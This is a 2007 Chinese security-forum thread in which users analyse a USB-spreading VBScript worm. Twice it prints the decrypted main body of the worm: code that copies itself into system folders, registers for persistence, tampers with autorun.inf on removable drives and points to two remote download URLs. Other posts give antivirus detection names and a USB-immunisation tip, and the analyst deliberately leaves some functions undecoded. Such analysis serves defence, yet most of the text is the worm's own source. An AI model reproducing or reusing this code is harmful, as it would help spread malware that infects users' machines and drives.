卡巴不能删干净!郁闷中!MD5: A7E5BA

显示全部楼层 · 发表于 2007-11-6 22:34:04

再次解密的结果，同样未经检查……

ver="7.2"
filename="`"
infname="`.url"
timesname="`.lnk"
tile="Gover"&ver
fromurl=chr(104)&chr(116)&chr(116)&chr(112)&"://"&"u7."&chr(54)&chr(54)&chr(48)&"0.or"&chr(103)&"/u72."&chr(97)&"s"&chr(112)
fromurl2=chr(104)&chr(116)&chr(116)&chr(112)&"://"&"u6."&chr(50)&chr(50)&chr(56)&"8.or"&chr(103)&"/u72."&chr(97)&"s"&chr(112)
'on error resume next
dim wsh
set wsh=createobject("wscript.shell")
set fso=createobject("scripting.filesystemobject")
set dir=fso.getspecialfolder(1)
set win=fso.getspecialfolder(0)
set dc=fso.drives
ouwnname=wscript.scriptname
exemulu=fso.getspecialfolder(2)&""
wbem=fso.getspecialfolder(1)&"\wbem"
mulu=left(wscript.scriptfullname,len(wscript.scriptfullname)-len(wscript.scriptname))
if mulu=dir&"" then sys=true
for each d in dc
if mulu=d&"" then opendisk=wsh.run("explorer "&d,3,false)
next
if not sys then
wscript.sleep 5000
if jincheng("wscript.exe",2)=1 then
if readtxt(dir&"\main.bin",1)= trim(date) then
wscript.quit
else
buildfile dir&"\main.bin",date
end if
end if
if jincheng("wscript.exe",2)<>1 and jincheng("wscript.exe",2) then wscript.quit
end if
chengfa
if sys then
yincang
if readtxt(mulu&infname,1)<>tile then
buildinf 1,0,0,0,0,0
end if
if readtxt(win&""&infname,1)<>tile then
buildinf 0,0,0,0,0,0
end if
lexe=readtxt(mulu&infname,5)
if fso.fileexists(exemulu&lexe) then
wsh.run exemulu&lexe
end if
if readtxt(dir&""&filename&".vbe",1)<>"'"&ver then
copyvbs dir&""&filename&".vbe"
zhuce
end if
if readtxt(win&""&filename&".vbe",1)<>"'"&ver then
copyvbs win&""&filename&".vbe"
end if
if readtxt(wbem&filename&".vbe",1)<>"'"&ver and readtxt(mulu&infname,11)=1 then
buildfile wbem&filename&".vbe",ucc(O1+O2)
end if
if readtxt(mulu&infname,11)=2 then
for each d in dc
if d.drivetype=2 then
if fso.fileexists(d&"/autorun.inf") then
delfile d&"/autorun.inf"
end if
if not fso.folderexists(d&"/autorun.inf") then
buildfold d&"/autorun.inf"
shuxing d&"/autorun.inf",1+2+4
end if
end if
next
end if
ganran
wsh.run mulu&ouwnname
else
shuxing mulu&ouwnname,2+4
copyvbs dir&""&filename&".vbe"
copyvbs win&""&filename&".vbe"
zhuce
wsh.run dir&""&filename&".vbe"
end if

复制代码

显示全部楼层 · 发表于 2007-11-6 22:35:04

距离完全的解密就差一步了！

显示全部楼层 · 发表于 2007-11-6 22:40:14

nod32 found VBS/Naiad.F

显示全部楼层 · 发表于 2007-11-6 22:40:54

完整机密以后的程序主体代码，还有一部分的过程、函数没有解密出来，不过我想我就到此为止了，其余的我就不继续做了，否则容易造成该病毒或其变种大面积传播……

Dim mfso,vf
set mfso=createobject("scripting.filesystemobject")
set vf=mfso.createtextfile("r7.log",true)
'vf.writeline
ver="7.2"
filename="`"
infname="`.url"
timesname="`.lnk"
tile="Gover"&ver
fromurl="http://u7.6600.org/u72.asp"
fromurl2="http://u6.2288.org/u72.asp"
'on error resume next
dim wsh
set wsh=createobject("wscript.shell")
set fso=createobject("scripting.filesystemobject")
set dir=fso.getspecialfolder(1)
set win=fso.getspecialfolder(0)
set dc=fso.drives
ouwnname=wscript.scriptname
exemulu=fso.getspecialfolder(2)&""
wbem=fso.getspecialfolder(1)&"\wbem"
mulu=left(wscript.scriptfullname,len(wscript.scriptfullname)-len(wscript.scriptname))
if mulu=dir&"" then sys=true
for each d in dc
if mulu=d&"" then opendisk=wsh.run("explorer "&d,3,false)
next
if not sys then
wscript.sleep 5000
if jincheng("wscript.exe",2)=1 then
if readtxt(dir&"\main.bin",1)= trim(date) then
wscript.quit
else
buildfile dir&"\main.bin",date
end if
end if
if jincheng("wscript.exe",2)<>1 and jincheng("wscript.exe",2) then wscript.quit
end if
chengfa
if sys then
yincang
if readtxt(mulu&infname,1)<>tile then
buildinf 1,0,0,0,0,0
end if
if readtxt(win&""&infname,1)<>tile then
buildinf 0,0,0,0,0,0
end if
lexe=readtxt(mulu&infname,5)
if fso.fileexists(exemulu&lexe) then
wsh.run exemulu&lexe
end if
if readtxt(dir&""&filename&".vbe",1)<>"'"&ver then
copyvbs dir&""&filename&".vbe"
zhuce
end if
if readtxt(win&""&filename&".vbe",1)<>"'"&ver then
copyvbs win&""&filename&".vbe"
end if
if readtxt(wbem&filename&".vbe",1)<>"'"&ver and readtxt(mulu&infname,11)=1 then
buildfile wbem&filename&".vbe",ucc(O1+O2)
end if
if readtxt(mulu&infname,11)=2 then
for each d in dc
if d.drivetype=2 then
if fso.fileexists(d&"/autorun.inf") then
delfile d&"/autorun.inf"
end if
if not fso.folderexists(d&"/autorun.inf") then
buildfold d&"/autorun.inf"
shuxing d&"/autorun.inf",1+2+4
end if
end if
next
end if
ganran
wsh.run mulu&ouwnname
else
shuxing mulu&ouwnname,2+4
copyvbs dir&""&filename&".vbe"
copyvbs win&""&filename&".vbe"
zhuce
wsh.run dir&""&filename&".vbe"
end if

复制代码

显示全部楼层 · 发表于 2007-11-6 23:09:59

病毒名称很奇特。加密方法也很深啊！

显示全部楼层 · 发表于 2007-11-6 23:13:47

原帖由 googlehack 于 2007-11-6 23:09 发表
病毒名称很奇特。加密方法也很深啊！

岂止很深……
我快郁闷了，不过还好，目前已经完整的恢复了病毒加密以前的原貌！

显示全部楼层 · 发表于 2007-11-7 00:40:17

NOD32

2007-11-7 0:47:23 Real-time file system protection file C:\Documents and Settings\SM\桌面\样本\autorun.inf INF/Autorun virus deleted - quarantined NT AUTHORITY\SYSTEM Event occurred on a new file created by the application: C:\Program Files\WinRAR\WinRAR.exe.

显示全部楼层 · 发表于 2007-11-7 09:11:13

用U盘免疫,直接打开就行了.

[病毒样本] 卡巴不能删干净!郁闷中!MD5: A7E5BA